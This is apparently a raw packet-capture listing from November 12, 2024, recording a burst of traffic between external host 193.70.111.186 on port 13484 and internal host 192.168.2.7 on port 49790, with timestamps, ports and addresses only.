Nov 12, 2024 18:45:32.280536890 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280545950 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280554056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280561924 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280579090 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280610085 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280679941 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280689955 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280699015 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280708075 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280715942 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280725002 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280735016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280742884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280762911 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280781984 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280783892 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280795097 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280808926 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280817032 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280826092 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280826092 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280834913 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280843973 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280852079 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280873060 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280896902 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280916929 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280925989 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280935049 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.280960083 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.280987978 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281301975 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281349897 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281380892 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281390905 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281435966 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281505108 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281514883 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281523943 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281549931 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281569958 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281687021 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281696081 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281773090 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281781912 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281795979 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281829119 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281852961 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281888962 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281898022 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281904936 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281944036 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.281956911 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281966925 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281975985 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281985044 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281995058 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.281996965 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282004118 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282012939 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282021999 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282031059 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282032013 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282041073 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282049894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282053947 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282058954 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282077074 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282084942 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282084942 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282095909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282105923 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282107115 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282115936 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282135010 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282140017 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282160044 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282165051 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282175064 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282176971 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282188892 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282197952 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282208920 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282211065 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282217979 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282228947 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282237053 CET	49790	13484	192.168.2.7	193.70.111.186
Nov 12, 2024 18:45:32.282290936 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282305002 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282313108 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282324076 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282331944 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282404900 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282413006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282422066 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282432079 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282526970 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282536030 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282545090 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282553911 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282565117 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282669067 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282676935 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282685995 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282695055 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282704115 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282804966 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282813072 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282821894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282927990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282937050 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282946110 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282985926 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282989979 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282994986 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.282998085 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283005953 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283047915 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283056021 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283066034 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283075094 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283082962 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283092022 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283099890 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283184052 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283191919 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283200026 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283210993 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283221006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283276081 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283284903 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283293962 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283360004 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283369064 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283376932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283385992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283405066 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283483982 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283492088 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283608913 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283617973 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283627033 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283689976 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283699036 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283706903 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283715010 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283724070 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283822060 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283830881 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283839941 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283848047 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283855915 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283864975 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283874035 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283883095 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283891916 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283904076 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283911943 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283967018 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.283974886 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284013033 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284023046 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284027100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284074068 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284082890 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284090996 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284547091 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284555912 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284564018 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284574032 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284584045 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284593105 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284600973 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284610033 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284617901 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284627914 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284636974 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284646034 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284655094 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284663916 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284672022 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284681082 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284688950 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284698009 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284707069 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284714937 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284723997 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284734011 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284742117 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284750938 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284761906 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284779072 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284797907 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284806967 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284815073 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284825087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284889936 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284946918 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284955978 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.284965038 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285088062 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285096884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285104990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285113096 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285121918 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285130978 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285198927 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285255909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285262108 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285267115 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285304070 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285312891 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285403013 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285412073 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285419941 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285429955 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285439968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285454988 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285553932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285562992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285618067 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285626888 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285634995 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285666943 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285756111 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285764933 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285773039 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285811901 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285820961 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285959959 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285969019 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285978079 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285985947 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.285994053 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286021948 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286031008 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286041021 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286050081 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286147118 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286155939 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286164999 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286175013 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286185026 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286293030 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286302090 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286309958 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286319017 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286331892 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286343098 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286351919 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286428928 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286439896 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286448956 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286458015 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286465883 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286561966 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286571026 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286578894 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286587954 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286596060 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286604881 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286659956 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286669016 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286676884 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286684990 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286694050 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286748886 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286757946 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286767006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286775112 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286783934 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286793947 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286809921 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286819935 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286922932 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286931992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286941051 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286950111 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286964893 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.286974907 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287091970 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287101030 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287108898 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287123919 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287204027 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287213087 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287221909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287230968 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287239075 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287249088 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287336111 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287344933 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287353992 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287363052 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287372112 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287380934 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287389040 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287398100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287419081 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287427902 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287436008 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287445068 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287656069 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287664890 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287672997 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287682056 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287689924 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287698984 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287709951 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287719011 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287734985 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287744045 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287751913 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287789106 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287796974 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287806034 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287925959 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287935019 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287942886 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287951946 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287961006 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287969112 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287976980 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287986040 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.287995100 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288003922 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288013935 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288022041 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288029909 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288045883 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288100004 CET	13484	49790	193.70.111.186	192.168.2.7
Nov 12, 2024 18:45:32.288108110 CET	13484	49790	193.70.111.186	192.168.2.7
